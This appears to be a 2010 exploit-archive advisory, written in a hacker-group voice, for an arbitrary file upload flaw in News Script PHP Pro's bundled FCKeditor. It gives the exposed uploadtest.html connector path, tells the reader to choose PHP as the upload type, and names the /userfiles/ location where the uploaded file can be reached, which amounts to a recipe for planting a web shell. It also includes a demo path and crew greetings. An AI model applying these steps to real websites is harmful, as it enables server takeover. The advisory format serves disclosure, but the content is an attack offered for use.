News Script PHP Pro (fckeditor) File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : News Script PHP Pro (fckeditor) File Upload Vulnerability
# Published : 2010-12-29
# Author : Net.Edit0r
# Previous Title : DGNews 2.1 SQL Injection Vulnerability
# Next Title : ardeaCore_v2.25 PHP Framework Remote File Inclusion

                                
==============================================================================
  
        [?] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
==============================================================================
  
    [?] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
    [?] Script  :           [ News Script PHP Pro  ]
  
    [?] TestedON:           [ linux/php ]
  
    [?] Download:           [ http://newsscriptphp.com/ ]
  
    [?] Author  :           [ Net.Edit0r }
  
    [?] Email   :           [ black.hat.tm@gmail.com ]
  
    [?] Date    :           [ 2010-12-26 ]
   
    [?] Version :           [ Full Version ]

    [?] CVE     :           [Web Applications]
  
###########################################################################
  
     
===[ Exploit ]===    ./Iranian HackerZ
  
  [?] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [?] Select the "File Upload" To use = php
 
===[ Upload To ]===
 
  [?] http://server/[patch]/userfiles/Name File
 
===[ Demo ]===

  [?] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
 
     BHG : Net.Edit0r ~ Darkcoder ~ keracker
                                   
###########################################################################